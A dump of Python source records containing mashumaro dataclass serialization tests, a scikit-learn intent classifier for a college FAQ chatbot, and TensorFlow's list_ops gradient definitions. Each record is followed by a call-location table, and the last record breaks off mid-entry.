    @dataclass
    class DataClass(DataClassDictMixin):
        x: date = field(metadata={"deserialize": "ciso8601"})

    should_be = DataClass(x=date(2021, 1, 2))
    instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
    assert instance == should_be

def test_ciso8601_time_parser():
    @dataclass
    class DataClass(DataClassDictMixin):
        x: time = field(metadata={"deserialize": "ciso8601"})

    should_be = DataClass(x=time(3, 4, 5))
    instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
    assert instance == should_be

def test_pendulum_datetime_parser():
    @dataclass
    class DataClass(DataClassDictMixin):
        x: datetime = field(metadata={"deserialize": "pendulum"})

    should_be = DataClass(x=datetime(2008, 12, 29, 7, tzinfo=timezone.utc))
    instance = DataClass.from_dict({"x": "2009-W01 0700"})
    assert instance == should_be

def test_pendulum_date_parser():
    @dataclass
    class DataClass(DataClassDictMixin):
        x: date = field(metadata={"deserialize": "pendulum"})

    should_be = DataClass(x=date(2008, 12, 29))
    instance = DataClass.from_dict({"x": "2009-W01"})
    assert instance == should_be

def test_pendulum_time_parser():
    @dataclass
    class DataClass(DataClassDictMixin):
        x: time = field(metadata={"deserialize": "pendulum"})

    should_be = DataClass(x=time(3, 4, 5))
    instance = DataClass.from_dict({"x": "2009-W01 030405"})
    assert instance == should_be

def test_unsupported_datetime_parser_engine():
    with pytest.raises(UnserializableField):

        @dataclass
        class DataClass(DataClassDictMixin):
            x: datetime = field(metadata={"deserialize": "unsupported"})

def test_global_function_datetime_parser():
    @dataclass
    class DataClass(DataClassDictMixin):
        x: datetime = field(
            metadata={"deserialize": ciso8601.parse_datetime_as_naive}
        )

    should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5))
    instance = DataClass.from_dict({"x": "2021-01-02T03:04:05+03:00"})
    assert instance == should_be

def test_local_function_datetime_parser():
    def parse_dt(s):
        return ciso8601.parse_datetime_as_naive(s)

    @dataclass
    class DataClass(DataClassDictMixin):
        x: datetime = field(metadata={"deserialize": parse_dt})

    should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5))
    instance = DataClass.from_dict({"x": "2021-01-02T03:04:05+03:00"})
    assert instance == should_be

def test_class_method_datetime_parser():
    class DateTimeParser:
        @classmethod
        def parse_dt(cls, s: str) -> datetime:
            return datetime.fromisoformat(s)

    @dataclass
    class DataClass(DataClassDictMixin):
        x: datetime = field(metadata={"deserialize": DateTimeParser.parse_dt})

    should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5))
    instance = DataClass.from_dict({"x": "2021-01-02T03:04:05"})
    assert instance == should_be

def test_class_instance_method_datetime_parser():
    class DateTimeParser:
        def __call__(self, s: str) -> datetime:
            return datetime.fromisoformat(s)

    @dataclass
    class DataClass(DataClassDictMixin):
        x: datetime = field(metadata={"deserialize": DateTimeParser()})

    should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5))
    instance = DataClass.from_dict({"x": "2021-01-02T03:04:05"})
    assert instance == should_be

def test_callable_class_instance_datetime_parser():
    class CallableDateTimeParser:
        def __call__(self, s):
            return ciso8601.parse_datetime(s)

    @dataclass
    class DataClass(DataClassDictMixin):
        x: datetime = field(metadata={"deserialize": CallableDateTimeParser()})

    should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc))
    instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
    assert instance == should_be

def test_lambda_datetime_parser():
    @dataclass
    class DataClass(DataClassDictMixin):
        x: datetime = field(
            metadata={"deserialize": lambda s: ciso8601.parse_datetime(s)}
        )

    should_be = DataClass(x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc))
    instance = DataClass.from_dict({"x": "2021-01-02T03:04:05Z"})
    assert instance == should_be

def test_derived_dataclass_metadata_deserialize_option():
    @dataclass
    class A:
        x: datetime = field(metadata={"deserialize": ciso8601.parse_datetime})

    @dataclass
    class B(A, DataClassDictMixin):
        y: datetime = field(metadata={"deserialize": ciso8601.parse_datetime})

    should_be = B(
        x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc),
        y=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc),
    )
    instance = B.from_dict(
        {"x": "2021-01-02T03:04:05Z", "y": "2021-01-02T03:04:05Z"}
    )
    assert instance == should_be

def test_bytearray_overridden():
    @dataclass
    class DataClass(DataClassDictMixin):
        x: bytearray = field(
            metadata={"deserialize": lambda s: s.upper().encode()}
        )

    should_be = DataClass(x=bytearray(b"ABC"))
    instance = DataClass.from_dict({"x": "abc"})
    assert instance == should_be

def test_path_like_overridden():
    @dataclass
    class DataClass(DataClassDictMixin):
        x: Path = field(
            metadata={"deserialize": lambda s: Path(str(s).upper())}
        )

    should_be = DataClass(x=Path("/ABC"))
    instance = DataClass.from_dict({"x": "/abc"})
    assert instance == should_be

def test_datetime_serialize_option():
    @dataclass
    class DataClass(DataClassDictMixin):
        x: datetime = field(
            metadata={"serialize": lambda v: v.strftime("%Y-%m-%d %H:%M:%S")}
        )

    should_be = {"x": "2021-01-02 03:04:05"}
    instance = DataClass(x=datetime(2021, 1, 2, 3, 4, 5, tzinfo=timezone.utc))
    assert instance.to_dict() == should_be

def test_third_party_type_overridden():
    @dataclass
    class DataClass(DataClassDictMixin):
        x: ThirdPartyType = field(
            metadata={
                "deserialize": lambda v: ThirdPartyType(v),
                "serialize": lambda v: v.value,
            }
        )

    should_be = DataClass(x=ThirdPartyType(123))
    instance = DataClass.from_dict({"x": 123})
    assert instance == should_be
    assert instance.to_dict() == {"x": 123}

def test_serializable_type_overridden():
    @dataclass
    class DataClass(DataClassDictMixin):
        x: MutableString = field(
            metadata={
                "deserialize": lambda s: MutableString(s.upper()),
                "serialize": lambda v: str(v).lower(),
            }
        )

    should_be = DataClass(x=MutableString("ABC"))
    instance = DataClass.from_dict({"x": "abc"})
    assert instance == should_be
    assert instance.to_dict() == {"x": "abc"}

def test_optional_overridden():
    @dataclass
    class DataClass(DataClassDictMixin):
        x: Optional[ThirdPartyType] = field(
            metadata={
                "deserialize": lambda v: ThirdPartyType(v),
                "serialize": lambda v: v.value,
            }
        )

    instance = DataClass.from_dict({"x": 123})
    assert instance
    assert instance.x.value == 123
    dct = instance.to_dict()
    assert dct["x"] == 123

def test_union_overridden():
    @dataclass
    class DataClass(DataClassDictMixin):
        x: Union[int, str, float, ThirdPartyType] = field(
            metadata={
                "deserialize": lambda v: ThirdPartyType(v),
                "serialize": lambda v: v.value,
            }
        )

    instance = DataClass.from_dict({"x": 1})
    assert instance == DataClass(x=ThirdPartyType(value=1))
    assert instance.to_dict() == {"x": 1}

def test_serialization_strategy():
    class TestSerializationStrategy(SerializationStrategy):
        def serialize(self, value):
            return [value]

        def deserialize(self, value):
            return value[0]

    @dataclass
    class DataClass(DataClassDictMixin):
        x: int = field(
            metadata={"serialization_strategy": TestSerializationStrategy()}
        )

    instance = DataClass(x=123)
    assert DataClass.from_dict({"x": [123]}) == instance
    assert instance.to_dict() == {"x": [123]}

def test_collection_derived_custom_class():
    @dataclass
    class DataClass(DataClassDictMixin):
        x: MyList = field(
            metadata={"serialize": lambda v: v, "deserialize": lambda v: v}
        )

    instance = DataClass(x=[1, 2, 3])
    assert DataClass.from_dict({"x": [1, 2, 3]}) == instance
    assert instance.to_dict() == {"x": [1, 2, 3]}

def test_dataclass_with_typed_dict_overridden():
    def serialize_x(x: TypedDictRequiredKeys) -> Dict[str, Any]:
        return {"int": int(x["int"]), "float": float(x["float"])}

    def deserialize_x(x: Dict[str, Any]) -> TypedDictRequiredKeys:
        return TypedDictRequiredKeys(int=x["int"], float=x["float"])

    @dataclass
    class DataClass(DataClassDictMixin):
        x: TypedDictRequiredKeys = field(
            metadata={"serialize": serialize_x, "deserialize": deserialize_x}
        )

    obj = DataClass(x=TypedDictRequiredKeys(int=1, float=2.0))
    data = {"x": {"int": 1, "float": 2.0}}
    assert DataClass.from_dict(data) == obj
    assert obj.to_dict() == data
| [((24, 22, 24, 65), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((34, 18, 34, 61), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((44, 18, 44, 61), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((54, 22, 54, 65), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((64, 18, 64, 61), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((74, 18, 74, 61), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((82, 9, 82, 43), 'pytest.raises', 'pytest.raises', ({(82, 23, 82, 42): 'UnserializableField'}, {}), '(UnserializableField)', False, 'import pytest\n'), ((92, 22, 94, 9), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((103, 15, 103, 50), 'ciso8601.parse_datetime_as_naive', 'ciso8601.parse_datetime_as_naive', ({(103, 48, 103, 49): 's'}, {}), '(s)', False, 'import ciso8601\n'), ((107, 22, 107, 63), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((122, 22, 122, 78), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((172, 22, 172, 78), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((176, 22, 176, 78), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((310, 20, 312, 9), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((328, 35, 330, 9), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((26, 28, 26, 78), 'datetime.datetime', 'datetime', (), '', False, 'from datetime import date, datetime, time, timezone\n'), ((36, 28, 36, 44), 'datetime.date', 'date', ({(36, 33, 36, 37): '2021', (36, 39, 36, 40): '1', (36, 42, 36, 43): '2'}, {}), '(2021, 1, 2)', False, 'from datetime import date, datetime, time, timezone\n'), ((46, 28, 46, 41), 'datetime.time', 'time', ({(46, 33, 46, 34): '3', (46, 36, 46, 37): '4', (46, 39, 46, 40): '5'}, {}), '(3, 4, 5)', False, 'from datetime import date, datetime, time, timezone\n'), ((56, 28, 56, 74), 'datetime.datetime', 'datetime', (), '', False, 'from datetime import date, datetime, time, timezone\n'), ((66, 28, 66, 46), 'datetime.date', 'date', ({(66, 33, 66, 37): '2008', (66, 39, 66, 41): '12', (66, 43, 66, 45): '29'}, {}), '(2008, 12, 29)', False, 'from datetime import date, datetime, time, timezone\n'), ((76, 28, 76, 41), 'datetime.time', 'time', ({(76, 33, 76, 34): '3', (76, 36, 76, 37): '4', (76, 39, 76, 40): '5'}, {}), '(3, 4, 5)', False, 'from datetime import date, datetime, time, timezone\n'), ((86, 26, 86, 72), 'dataclasses.field', 'field', (), '', False, 'from dataclasses import dataclass, field\n'), ((96, 28, 96, 57), 'datetime.datetime', 'datetime', ({(96, 37, 96, 41): '2021', (96, 43, 96, 44): '1', (96, 46, 96, 47): '2', (96, 49, 96, 50): '3', (96, 52, 96, 53): '4', (96, 55, 96, 56): '5'}, {}), '(2021, 1, 2, 3, 4, 5)', False, 'from datetime import date, datetime, time, timezone\n'), ((109, 28, 109, 57), 'datetime.datetime', 'datetime', ({(109, 37, 109, 41): '2021', (109, 43, 109, 44): '1', (109, 46, 109, 47): '2', (109, 49, 109, 50): '3', (109, 52, 109, 53): '4', (109, 55, 109, 56): '5'}, {}), '(2021, 1, 2, 3, 4, 5)', False, 'from datetime import date, datetime, time, timezone\n'), ((118, 19, 118, 
44), 'datetime.datetime.fromisoformat', 'datetime.fromisoformat', ({(118, 42, 118, 43): 's'}, {}), '(s)', False, 'from datetime import date, datetime, time, timezone\n'), ((124, 28, 124, 57), 'datetime.datetime', 'datetime', ({(124, 37, 124, 41): '2021', (124, 43, 124, 44): '1', (124, 46, 124, 47): '2', (124, 49, 124, 50): '3', (124, 52, 124, 53): '4', (124, 55, 124, 56): '5'}, {}), '(2021, 1, 2, 3, 4, 5)', False, 'from datetime import date, datetime, time, timezone\n'), ((132, 19, 132, 44), 'datetime.datetime.fromisoformat', 'datetime.fromisoformat', ({(132, 42, 132, 43): 's'}, {}), '(s)', False, 'from datetime import date, datetime, time, timezone\n'), ((138, 28, 138, 57), 'datetime.datetime', 'datetime', ({(138, 37, 138, 41): '2021', (138, 43, 138, 44): '1', (138, 46, 138, 47): '2', (138, 49, 138, 50): '3', (138, 52, 138, 53): '4', (138, 55, 138, 56): '5'}, {}), '(2021, 1, 2, 3, 4, 5)', False, 'from datetime import date, datetime, time, timezone\n'), ((146, 19, 146, 45), 'ciso8601.parse_datetime', 'ciso8601.parse_datetime', ({(146, 43, 146, 44): 's'}, {}), '(s)', False, 'import ciso8601\n'), ((152, 28, 152, 78), 'datetime.datetime', 'datetime', (), '', False, 'from datetime import date, datetime, time, timezone\n'), ((164, 28, 164, 78), 'datetime.datetime', 'datetime', (), '', False, 'from datetime import date, datetime, time, timezone\n'), ((179, 10, 179, 60), 'datetime.datetime', 'datetime', (), '', False, 'from datetime import date, datetime, time, timezone\n'), ((180, 10, 180, 60), 'datetime.datetime', 'datetime', (), '', False, 'from datetime import date, datetime, time, timezone\n'), ((207, 28, 207, 40), 'pathlib.Path', 'Path', ({(207, 33, 207, 39): '"""/ABC"""'}, {}), "('/ABC')", False, 'from pathlib import Path\n'), ((220, 27, 220, 77), 'datetime.datetime', 'datetime', (), '', False, 'from datetime import date, datetime, time, timezone\n'), ((161, 47, 161, 73), 'ciso8601.parse_datetime', 'ciso8601.parse_datetime', ({(161, 71, 161, 72): 's'}, {}), '(s)', False, 'import ciso8601\n')] |
yashrajt/college_FAQ-chatbot | Intent model/Intent_model.py | b3a2a1b4958068b652d019c13f31f6329b093c0a | import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
from sklearn.metrics import accuracy_score, confusion_matrix
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.pipeline import Pipeline
from sklearn.metrics import classification_report
from sklearn.linear_model import SGDClassifier
from nltk import word_tokenize
import nltk
#nltk.download('punkt')
import re
import joblib
def train_intent():
df = pd.read_csv("Training Data/intent_training_data.csv")
df.head
question = df["QUESTIONS"]
intent = df["INTENT"]
def preprocess(data):
data = data.lower()
# stop_words =['hers', 'between', 'yourself', 'but', 'again', 'there', 'about', 'once', 'during', 'out', 'very', 'having', 'with', 'they', 'own', 'an', 'be', 'some', 'for', 'do', 'its', 'yours', 'such', 'into', 'of', 'most', 'itself', 'other', 'off', 'is', 's', 'am', 'or', 'who', 'as', 'from', 'him', 'each', 'the', 'themselves', 'until', 'below', 'are', 'we', 'these', 'your', 'his', 'don', 'nor', 'me', 'were', 'her', 'more', 'himself', 'this', 'down', 'should', 'our', 'their', 'while', 'above', 'both', 'up', 'to', 'ours', 'had', 'she', 'all', 'no', 'when', 'at', 'any', 'before', 'them', 'same', 'and', 'been', 'have', 'in', 'will', 'on', 'does', 'yourselves', 'then', 'that', 'because', 'what', 'over', 'why', 'so', 'can', 'did', 'not', 'now', 'under', 'he', 'you', 'herself', 'has', 'just', 'where', 'too', 'only', 'myself', 'which', 'those', 'i', 'after', 'few', 'whom', 't', 'being', 'if', 'theirs', 'my', 'against', 'a', 'by', 'doing', 'it', 'how', 'further', 'was', 'here', 'than']
# word_tokens = word_tokenize(data)
# data = [w for w in word_tokens if not w in stop_words]
# for w in word_tokens:
# if w not in stop_words:
# data.append(w)
# data = " ".join(data)
        data = re.sub(r'[^a-zA-Z0-9]', " ", data)
        return data
    question = question.apply(preprocess)
    X = question
    y = intent
    my_tags = list(set(intent))
    #print(my_tags)
    #X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state = 0)
    sgd = Pipeline([('vect', CountVectorizer()),
                    ('tfidf', TfidfTransformer()),
                    #('tfidf',TfidfVectorizer()),
                    #("svc", svm.SVC(decision_function_shape='ovo')),
                    ('clf', SGDClassifier(loss='log', penalty='l2',alpha=1e-3, random_state=10, max_iter=10, tol=None)),
                    ])
    sgd.fit(X, y)
    #y_pred = sgd.predict(X_test)
    #t = sgd.predict_proba(["of electronics department"])
    #print(t)
    #print(sgd.predict(["what is the eligblity crieteria for addmisson in somaiya "]))
    #print('accuracy %s' % accuracy_score(y_pred, y_test))
    joblib.dump(sgd, 'intent_model_1.joblib')
#print(classification_report(y_test, y_pred,target_names=my_tags))
#train_intent()
'''
calender = 0
faculty =1
infra = 2
placement = 4
result = 5
small_talk = 6
student body = 7
syllabus = 8
'''
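# Illustrative inference sketch (assumed usage; the file name comes from joblib.dump above):
# model = joblib.load('intent_model_1.joblib')
# print(model.predict(["when are the placements held"]))  # predicted INTENT label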
| [((18, 9, 18, 62), 'pandas.read_csv', 'pd.read_csv', ({(18, 21, 18, 61): '"""Training Data/intent_training_data.csv"""'}, {}), "('Training Data/intent_training_data.csv')", True, 'import pandas as pd\n'), ((59, 4, 59, 45), 'joblib.dump', 'joblib.dump', ({(59, 16, 59, 19): 'sgd', (59, 21, 59, 44): '"""intent_model_1.joblib"""'}, {}), "(sgd, 'intent_model_1.joblib')", False, 'import joblib\n'), ((34, 15, 34, 49), 're.sub', 're.sub', ({(34, 22, 34, 37): '"""[^a-zA-Z0-9]"""', (34, 39, 34, 42): '""" """', (34, 44, 34, 48): 'data'}, {}), "('[^a-zA-Z0-9]', ' ', data)", False, 'import re\n'), ((44, 29, 44, 46), 'sklearn.feature_extraction.text.CountVectorizer', 'CountVectorizer', ({}, {}), '()', False, 'from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer\n'), ((45, 30, 45, 48), 'sklearn.feature_extraction.text.TfidfTransformer', 'TfidfTransformer', ({}, {}), '()', False, 'from sklearn.feature_extraction.text import TfidfTransformer\n'), ((48, 28, 48, 118), 'sklearn.linear_model.SGDClassifier', 'SGDClassifier', (), '', False, 'from sklearn.linear_model import SGDClassifier\n')] |
owennewo/kfserving | vendor/github.com/tensorflow/tensorflow/tensorflow/python/ops/list_ops.py | 89f73c87525b8e06ea799f69f2979c4ad272fcb3 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Ops to manipulate lists of tensors."""
# pylint: disable=g-bad-name
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_list_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_list_ops import *
# pylint: enable=wildcard-import
ops.NotDifferentiable("TensorListConcatLists")
ops.NotDifferentiable("TensorListElementShape")
ops.NotDifferentiable("TensorListLength")
ops.NotDifferentiable("TensorListPushBackBatch")
def empty_tensor_list(element_shape,
                      element_dtype,
                      max_num_elements=None,
                      name=None):
  if max_num_elements is None:
    max_num_elements = -1
  return gen_list_ops.empty_tensor_list(
      element_shape=_build_element_shape(element_shape),
      element_dtype=element_dtype,
      max_num_elements=max_num_elements,
      name=name)

def tensor_list_reserve(element_shape, num_elements, element_dtype, name=None):
  return gen_list_ops.tensor_list_reserve(
      element_shape=_build_element_shape(element_shape),
      num_elements=num_elements,
      element_dtype=element_dtype,
      name=name)

def tensor_list_from_tensor(tensor, element_shape, name=None):
  return gen_list_ops.tensor_list_from_tensor(
      tensor=tensor,
      element_shape=_build_element_shape(element_shape),
      name=name)

def tensor_list_concat(input_handle, element_dtype, name=None):
  # Ignore the lengths output of TensorListConcat. It is only used during
  # gradient computation.
  return gen_list_ops.tensor_list_concat(
      input_handle=input_handle, element_dtype=element_dtype, name=name)[0]

def tensor_list_split(tensor, element_shape, lengths, name=None):
  return gen_list_ops.tensor_list_split(
      tensor=tensor,
      element_shape=_build_element_shape(element_shape),
      lengths=lengths,
      name=name)

@ops.RegisterGradient("TensorListPushBack")
def _PushBackGrad(op, dresult):
  return gen_list_ops.tensor_list_pop_back(
      dresult, element_dtype=op.get_attr("element_dtype"))

@ops.RegisterGradient("TensorListPopBack")
def _PopBackGrad(op, dlist, delement):
  if dlist is None:
    dlist = empty_tensor_list(
        element_dtype=delement.dtype,
        element_shape=gen_list_ops.tensor_list_element_shape(
            op.outputs[0], shape_type=dtypes.int32))
  return gen_list_ops.tensor_list_push_back(dlist, delement)

@ops.RegisterGradient("TensorListStack")
def _TensorListStackGrad(unused_op, dtensor):
  return tensor_list_from_tensor(dtensor, element_shape=dtensor.shape[1:])

@ops.RegisterGradient("TensorListConcat")
def _TensorListConcatGrad(op, dtensor, unused_dlengths):
  # TODO(srbs): We lose the element_shape information in tensor_list_concat.
  # Consider providing that as an output of TensorListConcat?
  if dtensor.shape.rank is None:
    element_shape = None
  else:
    element_shape = [None] + dtensor.shape.as_list()[1:]
  return tensor_list_split(
      dtensor,
      element_shape=_build_element_shape(element_shape),
      lengths=op.outputs[1])

@ops.RegisterGradient("TensorListSplit")
def _TensorListSplitGrad(op, dlist):
  return tensor_list_concat(dlist, element_dtype=op.inputs[0].dtype), None, None

@ops.RegisterGradient("TensorListFromTensor")
def _TensorListFromTensorGrad(op, dlist):
  """Gradient for TensorListFromTensor."""
  if op.inputs[0].shape.dims and op.inputs[0].shape.dims[0].value is not None:
    num_elements = op.inputs[0].shape.dims[0].value
  else:
    num_elements = None
  if dlist is None:
    dlist = empty_tensor_list(
        element_dtype=op.inputs[0].dtype,
        element_shape=gen_list_ops.tensor_list_element_shape(
            op.outputs[0], shape_type=dtypes.int32))
  tensor_grad = gen_list_ops.tensor_list_stack(
      dlist, element_dtype=op.inputs[0].dtype, num_elements=num_elements)
  shape_grad = None
  return tensor_grad, shape_grad

@ops.RegisterGradient("TensorListGetItem")
def _TensorListGetItemGrad(op, ditem):
  """Gradient for TensorListGetItem."""
  list_size = gen_list_ops.tensor_list_length(op.inputs[0])
  list_grad = gen_list_ops.tensor_list_set_item(
      gen_list_ops.tensor_list_reserve(
          gen_list_ops.tensor_list_element_shape(op.inputs[0],
                                                 shape_type=dtypes.int32),
          list_size, element_dtype=ditem.dtype),
      index=op.inputs[1],
      item=ditem)
  index_grad = None
  return list_grad, index_grad

@ops.RegisterGradient("TensorListSetItem")
def _TensorListSetItemGrad(op, dlist):
  _, index, item = op.inputs
  list_grad = gen_list_ops.tensor_list_set_item(
      dlist, index=index, item=array_ops.zeros_like(item))
  index_grad = None
  element_grad = gen_list_ops.tensor_list_get_item(
      dlist, index, element_dtype=item.dtype)
  return list_grad, index_grad, element_grad

@ops.RegisterGradient("TensorListGather")
def _TensorListGatherGrad(op, dtensor):
  _, indices = op.inputs
  return gen_list_ops.tensor_list_scatter(
      tensor=dtensor, indices=indices,
      element_shape=ops.convert_to_tensor(-1, dtype=dtypes.int32)), None

@ops.RegisterGradient("TensorListScatter")
def _TensorListScatterGrad(op, dlist):
  t, indices, _ = op.inputs
  return gen_list_ops.tensor_list_gather(
      dlist, indices, element_dtype=t.dtype), None

def _build_element_shape(shape):
  """Converts shape to a format understood by list_ops for element_shape.

  If `shape` is already a `Tensor` it is returned as-is. We do not perform a
  type check here.

  If shape is None or a TensorShape with unknown rank, -1 is returned.

  If shape is a scalar, an int32 tensor with empty list is returned. Note we
  do directly return an empty list since ops.convert_to_tensor would convert it
  to a float32 which is not a valid type for element_shape.

  If shape is a sequence of dims, None's in the list are replaced with -1. We
  do not check the dtype of the other dims.

  Args:
    shape: Could be None, Tensor, TensorShape or a list of dims (each dim could
      be a None, scalar or Tensor).

  Returns:
    A None-free shape that can be converted to a tensor.
  """
  if isinstance(shape, ops.Tensor):
    return shape
  if isinstance(shape, tensor_shape.TensorShape):
    # `TensorShape.as_list` requires rank to be known.
    shape = shape.as_list() if shape else None
  # Shape is unknown.
  if shape is None:
    return -1
  # Shape is a scalar.
  if not shape:
    return ops.convert_to_tensor(shape, dtype=dtypes.int32)
  # Shape is a sequence of dimensions. Convert None dims to -1.
  return [d if d is not None else -1 for d in shape]
| [((33, 0, 33, 46), 'tensorflow.python.framework.ops.NotDifferentiable', 'ops.NotDifferentiable', ({(33, 22, 33, 45): '"""TensorListConcatLists"""'}, {}), "('TensorListConcatLists')", False, 'from tensorflow.python.framework import ops\n'), ((34, 0, 34, 47), 'tensorflow.python.framework.ops.NotDifferentiable', 'ops.NotDifferentiable', ({(34, 22, 34, 46): '"""TensorListElementShape"""'}, {}), "('TensorListElementShape')", False, 'from tensorflow.python.framework import ops\n'), ((35, 0, 35, 41), 'tensorflow.python.framework.ops.NotDifferentiable', 'ops.NotDifferentiable', ({(35, 22, 35, 40): '"""TensorListLength"""'}, {}), "('TensorListLength')", False, 'from tensorflow.python.framework import ops\n'), ((36, 0, 36, 48), 'tensorflow.python.framework.ops.NotDifferentiable', 'ops.NotDifferentiable', ({(36, 22, 36, 47): '"""TensorListPushBackBatch"""'}, {}), "('TensorListPushBackBatch')", False, 'from tensorflow.python.framework import ops\n'), ((83, 1, 83, 43), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(83, 22, 83, 42): '"""TensorListPushBack"""'}, {}), "('TensorListPushBack')", False, 'from tensorflow.python.framework import ops\n'), ((89, 1, 89, 42), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(89, 22, 89, 41): '"""TensorListPopBack"""'}, {}), "('TensorListPopBack')", False, 'from tensorflow.python.framework import ops\n'), ((99, 1, 99, 40), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(99, 22, 99, 39): '"""TensorListStack"""'}, {}), "('TensorListStack')", False, 'from tensorflow.python.framework import ops\n'), ((104, 1, 104, 41), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(104, 22, 104, 40): '"""TensorListConcat"""'}, {}), "('TensorListConcat')", False, 'from tensorflow.python.framework import ops\n'), ((118, 1, 118, 40), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(118, 22, 118, 39): '"""TensorListSplit"""'}, {}), "('TensorListSplit')", False, 'from tensorflow.python.framework import ops\n'), ((123, 1, 123, 45), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(123, 22, 123, 44): '"""TensorListFromTensor"""'}, {}), "('TensorListFromTensor')", False, 'from tensorflow.python.framework import ops\n'), ((141, 1, 141, 42), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(141, 22, 141, 41): '"""TensorListGetItem"""'}, {}), "('TensorListGetItem')", False, 'from tensorflow.python.framework import ops\n'), ((156, 1, 156, 42), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(156, 22, 156, 41): '"""TensorListSetItem"""'}, {}), "('TensorListSetItem')", False, 'from tensorflow.python.framework import ops\n'), ((167, 1, 167, 41), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(167, 22, 167, 40): '"""TensorListGather"""'}, {}), "('TensorListGather')", False, 'from tensorflow.python.framework import ops\n'), ((175, 1, 175, 42), 'tensorflow.python.framework.ops.RegisterGradient', 'ops.RegisterGradient', ({(175, 22, 175, 41): '"""TensorListScatter"""'}, {}), "('TensorListScatter')", False, 'from tensorflow.python.framework import ops\n'), ((96, 9, 96, 60), 'tensorflow.python.ops.gen_list_ops.tensor_list_push_back', 'gen_list_ops.tensor_list_push_back', ({(96, 44, 96, 49): 'dlist', (96, 51, 96, 59): 'delement'}, {}), '(dlist, delement)', False, 'from tensorflow.python.ops import gen_list_ops\n'), ((135, 16, 136, 73), 
'tensorflow.python.ops.gen_list_ops.tensor_list_stack', 'gen_list_ops.tensor_list_stack', (), '', False, 'from tensorflow.python.ops import gen_list_ops\n'), ((144, 14, 144, 59), 'tensorflow.python.ops.gen_list_ops.tensor_list_length', 'gen_list_ops.tensor_list_length', ({(144, 46, 144, 58): 'op.inputs[0]'}, {}), '(op.inputs[0])', False, 'from tensorflow.python.ops import gen_list_ops\n'), ((162, 17, 163, 45), 'tensorflow.python.ops.gen_list_ops.tensor_list_get_item', 'gen_list_ops.tensor_list_get_item', (), '', False, 'from tensorflow.python.ops import gen_list_ops\n'), ((71, 9, 72, 72), 'tensorflow.python.ops.gen_list_ops.tensor_list_concat', 'gen_list_ops.tensor_list_concat', (), '', False, 'from tensorflow.python.ops import gen_list_ops\n'), ((178, 9, 179, 44), 'tensorflow.python.ops.gen_list_ops.tensor_list_gather', 'gen_list_ops.tensor_list_gather', (), '', False, 'from tensorflow.python.ops import gen_list_ops\n'), ((214, 11, 214, 59), 'tensorflow.python.framework.ops.convert_to_tensor', 'ops.convert_to_tensor', (), '', False, 'from tensorflow.python.framework import ops\n'), ((147, 10, 148, 73), 'tensorflow.python.ops.gen_list_ops.tensor_list_element_shape', 'gen_list_ops.tensor_list_element_shape', (), '', False, 'from tensorflow.python.ops import gen_list_ops\n'), ((160, 31, 160, 57), 'tensorflow.python.ops.array_ops.zeros_like', 'array_ops.zeros_like', ({(160, 52, 160, 56): 'item'}, {}), '(item)', False, 'from tensorflow.python.ops import array_ops\n'), ((94, 22, 95, 51), 'tensorflow.python.ops.gen_list_ops.tensor_list_element_shape', 'gen_list_ops.tensor_list_element_shape', (), '', False, 'from tensorflow.python.ops import gen_list_ops\n'), ((133, 22, 134, 51), 'tensorflow.python.ops.gen_list_ops.tensor_list_element_shape', 